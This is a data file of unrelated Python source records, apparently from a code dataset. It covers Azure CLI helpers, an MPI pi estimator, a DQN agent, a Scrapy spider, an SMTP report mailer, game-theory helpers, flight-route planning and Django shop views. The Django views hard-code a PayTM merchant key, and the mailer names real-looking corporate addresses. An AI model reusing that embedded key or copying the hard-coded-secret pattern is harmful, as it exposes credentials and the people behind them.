cmd,\n client,\n group_name,\n display_name=None,\n parent_id=None):\n _register_rp(cmd.cli_ctx)\n return client.create_or_update(\n group_name, \"no-cache\", display_name, parent_id)\n\n\ndef cli_managementgroups_group_update_custom_func(\n instance,\n display_name=None,\n parent_id=None):\n instance[\"display_name\"] = display_name\n instance[\"parent_id\"] = parent_id\n return instance\n\n\ndef cli_managementgroups_group_update_get():\n update_parameters = {'display_name': 
None, 'parent_id': None}\n return update_parameters\n\n\ndef cli_managementgroups_group_update_set(\n cmd, client, group_name, parameters=None):\n _register_rp(cmd.cli_ctx)\n return client.update(\n group_name,\n \"no_cache\",\n parameters[\"display_name\"],\n parameters[\"parent_id\"])\n\n\ndef cli_managementgroups_group_delete(cmd, client, group_name):\n _register_rp(cmd.cli_ctx)\n return client.delete(group_name)\n\n\ndef cli_managementgroups_subscription_add(\n cmd, client, group_name, subscription):\n subscription_id = _get_subscription_id_from_subscription(\n cmd.cli_ctx, subscription)\n _register_rp(cmd.cli_ctx)\n _register_rp(cmd.cli_ctx, subscription_id)\n return client.create(group_name, subscription_id)\n\n\ndef cli_managementgroups_subscription_remove(\n cmd, client, group_name, subscription):\n subscription_id = _get_subscription_id_from_subscription(\n cmd.cli_ctx, subscription)\n _register_rp(cmd.cli_ctx)\n _register_rp(cmd.cli_ctx, subscription_id)\n return client.delete(group_name, subscription_id)\n","sub_path":"src/managementgroups/azext_managementgroups/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"150214012","text":"from unittest import TestCase\n\nfrom test import add_src_path\nadd_src_path()\nfrom embedding.idf import Idf\n\n\nclass TestIdf(TestCase):\n def test_get_idf(self):\n idf = Idf(['aa bb cc', 'aa dd ee', 'dd kk aa'])\n a_res = idf.get_idf('aa')\n d_res = idf.get_idf('dd')\n b_res = idf.get_idf('bb')\n self.assertEqual(a_res, 1)\n self.assertTrue(a_res < d_res)\n self.assertTrue(d_res < b_res)\n","sub_path":"test/embedding/test_idf.py","file_name":"test_idf.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"651353367","text":"from mpi4py import MPI\nimport numpy as np\n\ndef main():\n\t\"Module 6 
(Non-blocking)\"\n\n\tcomm = MPI.COMM_WORLD\n\trank = comm.Get_rank()\n\tsize = comm.Get_size()\n\tARRSIZE = 10**7\n\tresult = []\n\t\n\tif rank == 0:\n\t\tstart = MPI.Wtime()\n\t\tfor i in range(1,size):\n\t\t\treqin = comm.irecv(source = MPI.ANY_SOURCE, tag = 22)\n\t\t\tdata = reqin.wait()\n\t\t\tresult.append(data)\n\t\tprint(\"Module 6 (Non-blocking)\\n\")\n\t\tprint(\"RAW ARRAY:\\t\",result,\"\\n\")\n\t\tprint(\"Average Pi Estimation:\\t\",(sum(i['pi'] for i in result)/len(result)))\n\t\tprint(\"Average Execution Time:\\t\",(sum(i['time'] for i in result)/len(result)))\n\t\tprint(\"Total Execution Time:\\t\",MPI.Wtime()-start,\"\\n\")\n\t\tfor i in result:\n\t\t\tprint(\"Pi Estimation:\\t\",i['pi'],\"\\tExecution Time:\\t\",i['time'])\n\t\treturn result\n\telse:\n\t\tstart = MPI.Wtime()\n\t\tdata = np.random.rand(ARRSIZE*2)\n\t\tinside = np.sum((data[:ARRSIZE]**2 + data[ARRSIZE:]**2) <= 1)\n\t\tpi = 4 * inside / ARRSIZE\n\t\ttime = MPI.Wtime()-start\n\t\tdata = {'pi':pi,'time':time} \n\t\treqout = comm.isend(data, dest = 0, tag = 22)\n\t\treqout.wait()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Module6/MCPi_python_nonblocking2.py","file_name":"MCPi_python_nonblocking2.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"206066682","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nimport numpy as np\nimport math\nimport os\nimport random\n\n# 超参数\nBATCH_SIZE = 60\nLR = 0.001 # learning rate\nEPSILON = 0.9 # 最优选择动作百分比\nGAMMA = 0.9 # 奖励递减参数\nTARGET_REPLACE_ITER = 100 # Q 现实网络的更新频率\nMEMORY_CAPACITY = 30000 # 记忆库大小\nN_ACTIONS = 7 # 机械臂能做的动作\nN_STATES = 224*224*4\n\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n self.dense121 = models.resnet50(True) #(1, 1000)\n self.fc1 = nn.Linear(2000 + 3, 2048)\n self.fc2 = 
nn.Linear(2048, 64)\n self.fc3 = nn.Linear(64, 3)\n # self.fc3.weight.data *= 10\n\n def forward(self, rgb, deep, joint):\n rgb = self.dense121(rgb)\n deep = self.dense121(deep)\n # x = x.view(-1, 48*4*4)\n x = torch.cat([rgb.float(), deep.float(), joint.float()], dim=1)\n a = self.fc1(x)\n x = F.relu(self.fc2(a))\n x = self.fc3(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:]\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\nclass DQN(object):\n def __init__(self):\n self.device_ids = [0, 1]\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.eval_net = Net().cuda(self.device_ids[0]) # .to(self.device)\n self.target_net = Net().cuda(self.device_ids[0])\n self.eval_net = nn.DataParallel(self.eval_net, device_ids=self.device_ids)\n self.target_net = nn.DataParallel(self.target_net, device_ids=self.device_ids)\n self.learn_step_counter = 0 # 用于target更新计时\n self.memory_counter = 0 # 记忆库计数\n self.memory = np.zeros((MEMORY_CAPACITY, (224*224*4+3)*2+4))\n self.optimizer = torch.optim.Adam(self.eval_net.parameters(), lr=LR) # torch1 的优化器\n self.optimizer = nn.DataParallel(self.optimizer, device_ids=self.device_ids)\n self.loss_func = nn.MSELoss() # 误差公式\n\n # 根据神经网络选取一个值\n\n\n def choose_action(self, x):\n a = np.random.randint(1, 1000)\n # if a > 10:\n if np.random.uniform() < EPSILON*(math.exp(self.memory_counter-5000) if self.memory_counter <= 5000 else 1):\n # print \"****action from net****\"\n joint_view, image_view = x\n image_view = image_view / (256 * 256)\n image_view = image_view.astype(np.float32)\n rgb_np = np.array(image_view).reshape(-1, 224, 224, 4)[:, :, :, :3]\n dep_np = np.array(image_view).reshape(-1, 224, 224, 4)[:, :, :, 3].reshape(-1, 224, 224, 1)\n dep_np = np.concatenate((dep_np, dep_np, dep_np), axis=3)\n image_view_rgb = torch.from_numpy(rgb_np)\n image_view_rgb = image_view_rgb.permute(0, 3, 1, 2).cuda()\n image_view_dep = torch.from_numpy(dep_np)\n 
image_view_dep = image_view_dep.permute(0, 3, 1, 2).cuda()\n joint_view = torch.from_numpy(np.array(joint_view).reshape(-1, 3)).cuda()\n action = self.eval_net.forward(image_view_rgb, image_view_dep, joint_view).detach()\n action = action.cpu().numpy()\n else:\n # print \"****action for rand****\"\n action = np.random.uniform(low=-1.5, high=1.5, size=3)\n action = action[np.newaxis, :]\n return action\n\n def store_transition(self, s, a, r, s_):\n a = np.array(a).reshape(-1, 3)\n if a[0][0] is np.nan:\n return\n s1, s2 = s\n s3, s4 = s_\n\n if str(type(s3)) == '':\n s_ = s\n # s3 == list == numpy.float todo\n s3, s4 = s_\n s1 = np.array(s1).reshape(-1, 3)\n s2 = np.array(s2).reshape(-1, 224*224*4)\n r = np.array(r).reshape(-1, 1)\n s3 = np.array(s3).reshape(-1, 3)\n s4 = np.array(s4).reshape(-1, 224*224*4)\n\n transition = np.hstack((s1, s2, a, r, s3, s4))\n index = self.memory_counter % MEMORY_CAPACITY\n self.memory[index, :] = transition\n self.memory_counter += 1\n\n def learn(self):\n # type: () -> object\n # target net 参数更新\n # if self.learn_step_counter % TARGET_REPLACE_ITER == 0:\n # self.target_net.load_state_dict(self.eval_net.state_dict())\n self.learn_step_counter += 1\n\n # 抽取记忆库中的批数据\n sample_index = np.random.choice(MEMORY_CAPACITY, BATCH_SIZE)\n b_memory = self.memory[sample_index, :]\n b_joint1 = torch.FloatTensor((b_memory[:, :3]).reshape(-1, 3)).cuda()\n rgb_np = (b_memory[:, 3:N_STATES + 3]).reshape(-1, 224, 224, 4)[:, :, :, :3]\n dep_np = (b_memory[:, 3:N_STATES + 3]).reshape(-1, 224, 224, 4)[:, :, :, 3].reshape(-1, 224, 224, 1)\n dep_np = np.concatenate((dep_np, dep_np, dep_np), axis=3)\n b_rgb2 = torch.FloatTensor(rgb_np).permute(0, 3, 1, 2).cuda()\n b_dep2 = torch.FloatTensor(dep_np).permute(0, 3, 1, 2).cuda()\n # b_s = b_s1, b_s2\n b_a = torch.LongTensor((b_memory[:, N_STATES+3:N_STATES + 6]).reshape(-1, 3).astype(float)).cuda()\n b_r = torch.FloatTensor((b_memory[:, N_STATES + 6:N_STATES + 7]).reshape(-1, 1)).cuda()\n b_joint_1 = 
torch.FloatTensor((b_memory[:, N_STATES + 7:N_STATES + 10]).reshape(-1, 3)).cuda()\n rgb_np_ = (b_memory[:, -N_STATES:]).reshape(-1, 224, 224, 4)[:, :, :, :3]\n dep_np_ = (b_memory[:, -N_STATES:]).reshape(-1, 224, 224, 4)[:, :, :, 3].reshape(-1, 224, 224, 1)\n dep_np_ = np.concatenate((dep_np_, dep_np_, dep_np_), axis=3)\n b_rgb_2 = torch.FloatTensor(rgb_np_).permute(0, 3, 1, 2).cuda()\n b_dep_2 = torch.FloatTensor(dep_np_).permute(0, 3, 1, 2).cuda()\n\n # 针对做过的动作b_a, 来选 q_eval 的值, (q_eval 原本有所有动作的值)\n q_eval = self.eval_net(b_rgb2, b_dep2, b_joint1) # shape (batch, 1) picture and joint\n q_next = self.target_net(b_rgb_2, b_dep_2, b_joint_1).detach() # q_next 不进行反向传递误差, 所以 detach\n q_target = b_r + GAMMA * q_next # shape (batch, 1)\n loss = self.loss_func(q_eval, q_target)\n\n # 计算, 更新 eval net\n self.optimizer.zero_grad()\n loss.backward()\n # self.optimizer.step()\n self.optimizer.module.step()\n\n def save_model(self):\n model_number = self.get_file_number(\"eval_dqn\")\n print(\"model_number:\",model_number)\n torch.save(self.eval_net, \"model/eval_dqn/\" + str(model_number) + \".pkl\")\n torch.save(self.target_net, \"model/target_dqn/\" + str(model_number) + \".pkl\")\n\n def get_file_number(self, dir_name):\n a = 0\n file_dir = \"/home/ljt/ws/src/fetch_moveit_config/model/\"\n for root, dirs, files in os.walk(file_dir+dir_name):\n a = len(files)\n return a\n\n def get_last_model(self, dir_name):\n a = 0\n file_dir = \"/home/ljt/ws/src/fetch_moveit_config/model/\"\n lists = os.listdir(file_dir+dir_name) # 列出目录的下所有文件和文件夹保存到lists\n lists.sort(key=lambda fn: os.path.getmtime(file_dir+dir_name + \"/\" + fn)) # 按时间排序\n return int(lists[-1][:-4])\n\n\nif __name__ == \"__main__\":\n net = DQN()\n # print net.get_file_number(\"target_dqn\")\n # print net.get_last_model(\"target_dqn\")\n\n # input = torch.randn(3), torch.randn(4, 224, 224)\n # input = np.random.randn(3), np.random.randn(4, 224, 224)\n # out = net.choose_action(input)\n # # net.learn()\n # 
print(type(out))\n\n\n\n","sub_path":"DQN_SERVER/DQN.py","file_name":"DQN.py","file_ext":"py","file_size_in_byte":7781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"229120968","text":"'''\nCreated on 2012-2-1\n\n@author: Administrator\n'''\ndef moveInTurn(sequence, length, distance):\n try:\n# print(sequence)\n if length % distance == 0:\n '''divisibility'''\n for i in range(0, distance):\n temp = sequence[i]\n j = i + distance\n while j < length:\n sequence[j - distance] = sequence[j]\n j = j + distance\n sequence[j - distance] = temp\n else:\n '''Not divisibility'''\n i = 0\n temp = sequence[0]\n for j in range(0, length - 1):\n \n sequence[i] = sequence[(i + distance) % length]\n i = (i + distance) % length\n# print(sequence)\n sequence[i] = temp\n# print(sequence)\n except:\n import traceback\n traceback.print_exc()\n print(\"ERROR LIST = \", sequence)\n print(\"i = \", i)\n print(\"j = \", j)\n return sequence\n\ndef moveRecursively(sequence, length, distance):\n distance = distance % length\n if distance <= 0:\n return sequence\n if distance <= length / 2:\n for i in range(0, distance):\n #ABC -> CBA\n temp = sequence[i]\n sequence[i] = sequence[length - distance + i]\n sequence[length - distance + i] = temp \n sequence = moveRecursively(sequence[:length - distance], length - distance, distance)\\\n + sequence[length - distance:length]\n return sequence\n else:\n half = int(length / 2)\n sequence = moveRecursively(sequence, length, half)\n sequence = moveRecursively(sequence, length, distance - half)\n return sequence\n\ndef moveReversely(sequence, length, distance):\n distance = distance % length\n def reverse(l):\n length = len(l)\n half = int(len(l) / 2)\n for i in range(0, half):\n temp = l[i]\n l[i] = l[length - 1 - i]\n l[length - 1 - i] = temp\n return l\n\n sequence = reverse(sequence[0 : distance]) + sequence[distance : length]\n# print(sequence)\n sequence = sequence[0 : distance] + 
reverse(sequence[distance : length])\n# print(sequence)\n sequence = reverse(sequence)\n# print(sequence)\n return sequence\n\nif __name__ == '__main__':\n i = 7\n l = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n# l = [1, 2, 3, 4, 5]\n f = moveReversely\n moved_list = f(l, len(l), i)\n print(\"moved_list = \", moved_list)","sub_path":"src/pearls/chapter2/e4.py","file_name":"e4.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"422830210","text":"def main():\n #input = raw_input\n for trial in range(int(input())):\n string1 = input() + 'z'\n string2 = input() + 'z'\n new_string = []\n n, m = 0, 0\n while n < len(string1) and m < len(string2):\n if string1[n:] < string2[m:]:\n new_string.append(str(string1[n]))\n n += 1\n else:\n new_string.append(str(string2[m]))\n m += 1\n new_string.pop()\n print(''.join(new_string) + ''.join(string1[n:-1]) + ''.join(string2[m:-1]))\n\nif __name__ == '__main__':\n main()","sub_path":"algorithms/strings/morgan_string/test_morgan.py","file_name":"test_morgan.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"414815945","text":"#!/usr/bin/env python\n\nimport smtplib\n\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n#from email.MIMEBase import MIMEBase\nfrom email.mime import base\nfrom email import encoders\nfrom os import getcwd\nimport argparse\nimport logging\nimport sys\n#import phoneRegistration\nimport ReportDriver\nimport subprocess\n\nBODY_TEXT_FILE = \"report.html\"\n\nme = \"ccorti@cisco.com\"\nyou = [\"team-infrared-all@cisco.com\", \"satishk@cisco.com\"]\n#you = \"ccorti@cisco.com\"\n# Create message container - the correct MIME type is multipart/alternative.\n#msg = MIMEMultipart('alternative')\nmsg = MIMEMultipart()\nmsg['Subject'] = \"Morning Report: to Infrared (with audio/video packet 
loss spreadsheet)\"\nmsg['From'] = me\n#msg['To'] = you\nmsg['To'] = \", \".join(you)\n\n\ndef configure_logging():\n print (\"Configuring logging \\n\")\n current_path = getcwd()\n logging.basicConfig(filename=current_path + '/unregisteredPhones.log', filemode='w', level=logging.DEBUG,\n format='%(levelname)s:%(asctime)s:%(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')\n logging.info\n\ndef send_email():\n\t# Create the body of the message (a plain-text and an HTML version)\n\tf = open(BODY_TEXT_FILE, \"r\")\n\tbody = f.read()\n\t# Attach text or html file\n\tpart = base.MIMEBase('application', \"octet-stream\")\n\t#part.set_payload(open(\"junkb.txt\", \"rb\").read())\n\tpart.set_payload(open(\"registered.txt\", \"rb\").read())\n\tencoders.encode_base64(part)\n\n\t#part.add_header('Content-Disposition', 'attachment; filename=\"text.txt\"') # any filename\n\t# still text\n\tpart.add_header('Content-Disposition', 'attachment; filename=\"registered.txt\"') # any filename\n\tmsg.attach(part)\n\n\tpart1 = base.MIMEBase('application', \"octet-stream\")\n\tpart1.set_payload(open(\"unregistered.txt\", \"rb\").read())\n\tencoders.encode_base64(part1)\n\tpart1.add_header('Content-Disposition', 'attachment; filename=\"unregistered.txt\"') # any filename\n\t# Record the MIME types of both parts - text/plain and text/html.\n\t#part1 = MIMEText(text, 'plain')\n\t#part2 = MIMEText(html, 'html')\n\n\t# Attach parts into message container.\n\t# According to RFC 2046, the last part of a multipart message, in this case\n\t# the HTML message, is best and preferred.\n\t#print (\"attaching part 1\")\n\tmsg.attach(part1)\n\t#msg.attach(part2)\n\n\t##################################################\n\t# Try sending xls attachment\n\t##################################################\n\tfp = open('packetLossToday.xls', 'rb')\n\tfile1=base.MIMEBase('application', 
'vnc.ms-excel')\n\tfile1.set_payload(fp.read())\n\tfp.close()\n\tencoders.encode_base64(file1)\n\tfile1.add_header('Content-Disposition', 'attachment; filename=packetLoss.xls')\n\tmsg.attach(file1)\n\n\n\n\tmsg.attach(MIMEText(body, 'html'))\n\t# Send the message via local SMTP server.\n\ts = smtplib.SMTP('mail.cisco.com', 25)\n\t# sendmail function takes 3 arguments: sender's address, recipient's address\n\t# and message to send - here it is sent as one string.\n\ts.sendmail(me, you, msg.as_string())\n\ts.quit()\n\n\ndef main(argv): \n\n configure_logging()\n parser = argparse.ArgumentParser()\n parser.add_argument(\"json\", help=\"JSON File To Parse (including path)\")\n argv = parser.parse_args()\n if (argv.json):\n fname = argv.json\n #print (\"json file {}\".format(fname))\n #query = phoneRegistration.read_in_query(fname)\n else:\n print(\"Provide the json file containing a query string\")\n sys.exit()\n \n #phoneRegistration.reg_and_unreg(query)\n #phoneRegistration.add_header_to_report()\n #phoneRegistration.collect_reg_stats()\n #r = ReportDriver.ReportDriver().main(fname)\n\n send_email()\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","sub_path":"dev-ops/src/util/stats/emailTool.py","file_name":"emailTool.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"77992059","text":"def _bigger(x, y):\n # Retorna o indice do maior valor entre \"x\" e \"y\"\n\n return 0 if x > y else 1\n\n\ndef _vote(x, y, database):\n # Manipila a database, incerindo o voto\n\n y *= 2\n database[x + y] += 1\n\n\ndef findNE(M):\n # A entrada de M deve ser uma lista ou tupula\n # Ex.: [[[a, b], [c, d]],\n # [[e, f], [g, h]]]\n # Onde teremos M[x][y][z]\n # x = linha y = coluna z = elemento (Player 1, ou 2)\n #\n # Em python se começa contar o 0.\n\n # possiveis jogadas em uma matrix 2x2\n\n jogada = {0: [0, 0], 1: [0, 1], 2: [1, 0], 3: [1, 1]}\n\n # votos em cada possivel 
jogada\n\n votos = [0, 0, 0, 0]\n\n p1_1 = _bigger(M[0][0][0], M[1][0][0])\n p1_2 = _bigger(M[0][1][0], M[1][1][0])\n _vote(p1_1, 0, votos)\n _vote(p1_2, 1, votos)\n\n p2_1 = _bigger(M[0][0][1], M[0][1][1])\n p2_2 = _bigger(M[1][0][1], M[1][1][1])\n _vote(0, p2_1, votos)\n _vote(1, p2_2, votos)\n\n # Jogada decidida\n\n ne = jogada[votos.index(max(votos))]\n\n x = ne[0]\n y = ne[1]\n\n # valor da jogada decidida\n\n nev = M[x][y]\n\n return ne, nev\n\n\ndef findmixedNE(M):\n # Variables :\n\n a = M[0][0][0]\n b = M[0][0][1]\n c = M[0][1][0]\n d = M[0][1][1]\n e = M[1][0][0]\n f = M[1][0][1]\n g = M[1][1][0]\n h = M[1][1][1]\n\n # Basic expression's variables\n\n sigma_up = (h - f) / (b + h - f - d)\n sigma_down = 1 - sigma_up\n\n sigma_left = (g - h) / (a + g - c - e)\n sigma_right = 1 - sigma_left\n\n payoff_probability = [[sigma_up * sigma_left, sigma_up * sigma_right],\n [sigma_down * sigma_left, sigma_down * sigma_right]]\n\n sigmas = [[sigma_up, sigma_down], [sigma_left, sigma_right]]\n\n # Output's\n\n pp = payoff_probability\n payoff = [[[pp[0][0] * a, pp[0][0] * b], [pp[0][1] * c, pp[0][1] * d]],\n [[pp[1][0] * e, pp[1][0] * f], [pp[1][1] * g, pp[1][1] * h]]]\n\n ne = sigmas\n nev = payoff\n\n return ne, nev\n","sub_path":"old/v_0.1/exercise/exercicio.py","file_name":"exercicio.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"508618445","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom sinaNews.items import SinanewsItem\nimport json\nfrom scrapy_splash import SplashRequest\n\n\nclass NewsSpider(scrapy.Spider):\n name = 'news'\n allowed_domains = []\n #start_urls = ['http://news.sina.com.cn/guide/']\n start_urls = ['http://feed.mix.sina.com.cn/api/roll/get?pageid=107&lid=1244&num=30&page=']\n def start_requests(self):\n for count in range(3):\n yield scrapy.Request(self.start_urls[0]+str(count+1), callback=self.parse)\n 
print(self.start_urls[0]+str(count+1))\n\n def parse(self, response):\n data = json.loads(response.body)\n for each in data['result']['data']:\n #yield scrapy.Request(each['url'], callback=self.article_item)\n yield SplashRequest(each['url'], self.article_item, args={'wait': 0.5})\n\n def article_item(self,response):\n item = SinanewsItem()\n item['article_url'] = response.url\n item['title'] = response.xpath(\"//h1/text()\").extract()[0]\n item['simple'] = response.xpath(\"//div[@class='quotation']//p/text()\").extract()[0]\n item['conment'] = response.xpath(\"//div[@class='article']//p/text()\").extract()[0]\n yield item","sub_path":"sinaNews/spiders/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564717598","text":"'''\nV3 版本的航线规划\n处理的仍然是2维坐标\nv2的主要问题就是无法跳出死循环,以及无法避免死循环的解所造成的影响\n\nV3 的目标是将求解过程进行优化\n需要解决一下问题\n1. 对于给定的路线,能够产生出所有的线路规划集合\n2. 优化算法,以适应新的三维坐标模式\n3. 
利用 idea 中的想法实现,保证动然三维最短路径同时起飞航线规划\n'''\n\nimport pickle\nfrom airWayV2 import MyMathTools, AirPlane, AirWay\nimport random\nimport matplotlib.pyplot as plt\nimport copy\n\n\n# def plot_view(air_plan_list):\n#\n# for item in air_plan_list:\n#\n# plt.plot(item.Up, item.Down)\n#\n# plt.show()\n\n\nclass AirPlanPlus:\n def __init__(self):\n # 用于存储在给定的航班信息下的所有可能的航班起飞时间集合\n self.air_plan_list = []\n\n # 将当前的航班 now_air 和 exist_air_list 进行对比,看是否满足安全起飞条件\n # 同时,会对当前航班进行处理,但是又会符合一定的限制(如:起飞时间不能超过多少分钟)\n # todo:搞清楚 pyhon 如何修改传递值 如果不可以,对函数进行返回值改造\n def if_safe_up(self, now_air, exist_air_list, time_limit=100000):\n\n '''\n 判断当前航班能否在已有的条件下起飞,如果可以,返回True,否则,返回False\n 同时如果满足起飞限制,此函数会对航班的起飞时间进行修改\n\n :param now_air: 当前航班\n :param exist_air_list: 已经存在的航班限制��表\n :param time_limit: 时间限制\n :return: True表示满足条件,可以加入, False 表示不满足条件,不可以加入航班计划\n '''\n\n air = now_air\n\n # 对于每一个元素,对比三种限制,满足可以加入, 不满足则不可以加入\n # 同时,总体起飞时间限制在 time_limit 分钟内\n for item in exist_air_list:\n\n ifcorrect = False\n\n while not ifcorrect and air.upTime <= time_limit:\n # if nextWay.ifCrossSafe(item):\n # print('cross safe')\n # if nextWay.sameUpPointCheck(item):\n # print('up correct')\n # if nextWay.sameDownPointCheck(item):\n\n if air.ifCrossSafe(item):\n if air.sameUpPointCheck(item):\n if air.sameDownPointCheck(item):\n ifcorrect = True\n\n if not ifcorrect:\n air.upTime += 0.5\n # count += 1\n\n if air.upTime > time_limit:\n air.upTime = 0\n return -1\n\n return now_air.upTime\n\n def air_plan_of_2d(self, air_list, exist_air):\n '''\n 递归方法: 基于已有的航班序列进行判断\n\n 算法思路:\n 首先随机选择一个航班,然后判断它是否能够安全起飞,如果可以,则加入当前的航班列表,并递归此流程\n 否则,将整个列表删除(因为在此序列下无法产生有效的序列)\n\n :param air_list: 已有的航班序列\n :param exist_air: 未指派的航班序列\n :return:\n '''\n\n # air_plan = []\n\n # todo:保证算法已经穷尽了以 root_air 为起飞基准点的所有的可能\n # 解决方法1 : 设计一个迭代算法,使得算法能够满足所有需求\n\n # 随机选择一个初始起飞点, 也可以自己指派\n if len(air_list) > 0:\n root_air = random.choice(air_list)\n air_list.remove(root_air)\n # air_list.remove(root_air)\n else:\n # print('error in this ')\n return False\n\n # 
print('now root air is :')\n # print(root_air.Up)\n # print(root_air.Down)\n\n # 输出\n # -----------------------------------------------\n # plan_num = 'the plan is :'\n # print('--------------------------------------------------------')\n # print(plan_num)\n #\n # for item in exist_air:\n # air_str = str(item.UpName) + ' to ' + str(item.DownName) + ':' + str(item.upTime)\n # print(air_str)\n #\n # self.air_plan_list.append(exist_air)\n # print('-------------------------------------------------------')\n # ------------------------------------------------\n\n # root_air = air_list[0]\n\n\n # todo: 保证航路的运行\n # todo: 保证 exist_air 的初始化\n # exist_air = []\n # exist_air.append(_air)\n\n # todo:如果有多种可以选择的方向,如何处理\n\n # 递归解决问题:\n # 如果没有航班未指派,那么判断当前航班能否加入航班计划,\n # 若能,加入,并且结束递归,否则,消除当前计划,并且结束递归\n # 如果有航班未指派,那么顺序选择航班,,如果满足条件,将余下的列表进入递归流程\n # 否则此方法不同,不进入递归流程\n\n # 构造函数,判断当前航班能否在限制条件下起飞\n # print('run this')\n if len(air_list) == 0: # 当余下的航班为0时,如果当前航班可以,则加入航班计划,否则清空序列\n\n time = self.if_safe_up(root_air, exist_air)\n if time == -1:\n del air_list, exist_air\n return False\n else:\n # root_air = self.if_safe_up(root_air, exist_air)\n root_air.upTime = time\n exist_air.append(root_air)\n\n # 输出\n # -----------------------------------------------\n plan_num = 'the plan is :'\n print(plan_num)\n\n\n plt.axis([0, 200, 0, 250])\n\n for item in exist_air:\n air_str = item.UpName + ' to ' + item.DownName + ':' + str(item.upTime)\n plt.plot([item.Up[0], item.Down[0]], [item.Up[1], item.Down[1]])\n plt.text(item.Up[0], item.Up[1], item.upTime)\n print(air_str)\n\n plt.show()\n\n\n print('------------------------------------------------------')\n\n return True\n # self.air_plan_list.append(exist_air)\n # ------------------------------------------------\n\n # print('run good')\n\n else: # 当前的航班不为0 ,如果当前的航班可以,则加入序列,继续递归过程,否则,清空序列,结束当前线路\n time = self.if_safe_up(root_air, exist_air)\n if time == -1:\n\n # print(self.if_safe_up(root_air, exist_air))\n\n del air_list, exist_air\n return False\n 
else:\n\n # print(self.if_safe_up(root_air, exist_air))\n # root_air = self.if_safe_up(root_air, exist_air)\n\n root_air.upTime = time\n exist_air.append(root_air)\n self.air_plan_of_2d(air_list, exist_air)\n\nif __name__ == \"__main__\":\n\n # 生成航班信息 并且返回起飞 降落点信息\n # airWay, airUpPoint, airDownPoint = AirWay.randomDiffAirWay()\n airWay, airUpPoint, airDownPoint = AirWay.easyAirWay()\n\n # 航线输出\n # print(airWay)\n # print(airUpPoint)\n # print(airDownPoint)\n\n # 画图\n # for i in range(0, 24):\n # plt. (airUpPoint[airWay[i][0]], airUpPoint[airWay[i][1]])\n\n\n # 将所有的航班信息进行赋值, 生成航班列表\n # airList = []\n # for item in airWay:\n # for i in range(1, 3):\n\n # print(airUpPoint[item[0]])\n # print(airDownPoint[item[1]])\n\n # air = AirPlane(airNum=i, UpPoint=airUpPoint[item[0]], DownPoint=airDownPoint[item[1]], UpPointName=item[0], DownPointName=item[1], uptime=0)\n\n # print(air.number)\n # print(air.Up)\n # print(air.Down)\n # print(air.UpName)\n # print(air.DownName)\n # print(air.upTime)\n\n # airList.append(air)\n\n # 简化,只设置12条航班\n simp_air_list = []\n for item in airWay:\n # print(airUpPoint[item[0]])\n # print(airDownPoint[item[1]])\n air = AirPlane(airNum=0, UpPoint=airUpPoint[item[0]], DownPoint=airDownPoint[item[1]], UpPointName=item[0],\n DownPointName=item[1], uptime=0)\n # print(air.number)\n # print(air.Up)\n # print(air.Down)\n # print(air.UpName)\n # print(air.DownName)\n # print(air.upTime)\n\n simp_air_list.append(air)\n\n # for air in airList:\n # print(air.Up)\n # print(air.Down)\n\n # print(airList)\n\n air_plan_plus = AirPlanPlus()\n\n # 所有方法递归\n count = 0\n for i in range(1, 100000):\n\n air_list = simp_air_list.copy()\n\n for item in air_list:\n item.upTime = 0\n\n # print(len(air_list))\n air_plan_plus.air_plan_of_2d(air_list, [])\n # print('error route')\n count += 1\n\n # 进行图像化输出\n # air_plan_list = air_plan_plus.air_plan_list\n\n # print(air_plan_list)\n\n # count = 1\n # for plan_list in air_plan_list:\n #\n # plan_num = 'the plan No.' 
+ count + 'is :'\n # print(plan_num)\n # count += 1\n #\n # for item in plan_list:\n # air_str = item.UpName + ' to ' + item.DownName + ':' + item.upTime\n # print(air_str)\n","sub_path":"airWayV3.py","file_name":"airWayV3.py","file_ext":"py","file_size_in_byte":9578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"367944589","text":"import json\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Product, Contact, Order, OrderTracker\nfrom math import ceil\n# for paytm exempting csrf\nfrom django.views.decorators.csrf import csrf_exempt\nfrom PayTM import Checksum\n\nMERCHANT_KEY = 'kbzk1DSbJiV_O3p5'\n\n# Create your views here.\n\ndef index(request):\n \"\"\"As we'll show 4 images in one carousel\n Doing int division of total_products by 4 and then adding the remaining products\n that is suppose I have 6 products\n then 6//4 = 1\n ceil(6/4) = 2\n - total_products//4 = 1\n 1 + (2 - 1) = 2 slides\"\"\"\n # my_products = 